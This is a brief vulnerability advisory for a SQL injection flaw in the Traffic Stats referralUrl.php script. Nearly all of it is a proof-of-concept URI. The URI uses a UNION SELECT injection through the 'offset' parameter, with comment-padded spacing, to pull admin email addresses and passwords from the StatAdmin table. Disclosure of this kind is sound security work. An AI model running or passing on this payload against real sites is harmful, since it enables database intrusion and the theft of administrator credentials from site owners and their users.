Traffic Stats ReferralUrl.PHP SQL Injection Vulnerability

Traffic Stats ReferralUrl.PHP SQL Injection Vulnerability

The following is a proof-of-concept URI that demonstrates this issue:

http://www.example.com/Script_Dir/referralUrl.php?offset=-1/**/UNION%20ALL/**/SELECT%/**/1,2,concat(email,0x3a,password)/**/FROM/**/StatAdmin/*